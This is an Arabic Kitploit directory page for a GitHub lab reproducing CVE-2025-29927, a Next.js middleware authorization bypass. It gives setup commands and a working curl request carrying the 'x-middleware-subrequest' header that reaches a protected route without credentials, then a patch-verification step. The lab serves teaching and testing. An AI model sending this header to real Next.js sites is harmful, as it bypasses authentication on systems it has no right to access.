Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-29927-lab — مختبر إعادة إنتاج لـ CVE-2025-29927 — تجاوز تفويض الوسيطة في Next.js (CVSS 9.1) | Kitploit
أدوات/GitHubGitHub/swapnildeshpande/cve-2025-29927-lab
تحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليممختبرات وتدريب عملي
GitHubswapnildeshpande/cve-2025-29927-lab

cve-2025-29927-lab

مختبر إعادة إنتاج لـ CVE-2025-29927 — تجاوز تفويض الوسيطة في Next.js (CVSS 9.1)

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر CVE-2025-29927

مختبر مصغر لإعادة إنتاج CVE-2025-29927 — تجاوز تفويض الوسيطة في Next.js (CVSS 9.1).

مرافق لـ: مقال تحليل N-Day على Medium

ما هذا

تطبيق Next.js 15.2.2 (ضعيف) مع مسار /dashboard محمي بواسطة ملف تعريف ارتباط. يمكن تجاوز فحص تفويض الوسيطة عبر إرسال رأس HTTP واحد — بدون الحاجة إلى بيانات اعتماد.

المتطلبات

  • Node.js 18+

الإعداد

root@kitploit:~
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001

إعادة إنتاج التجاوز

الخطوة 1 — تأكيد حظر الوسيطة للطلبات غير الموثقة:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307

الخطوة 2 — تجاوز الوسيطة باستخدام رأس الطلب الفرعي:

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200

الخطوة 3 — الترقية إلى الإصدار المُصحح وتأكيد حظر التجاوز:

root@kitploit:~
npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307

مسارات التطبيق

المسارالوصول
/عمومي
/loginعمومي
/dashboardمحمي بواسطة الوسيطة (يتطلب ملف تعريف ارتباط session)

الإصدارات المتأثرة

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

المراجع

  • NVD — CVE-2025-29927
  • طلب السحب للإصلاح في Next.js #77201
  • المصدر الضعيف — sandbox.ts
تنزيل الأداة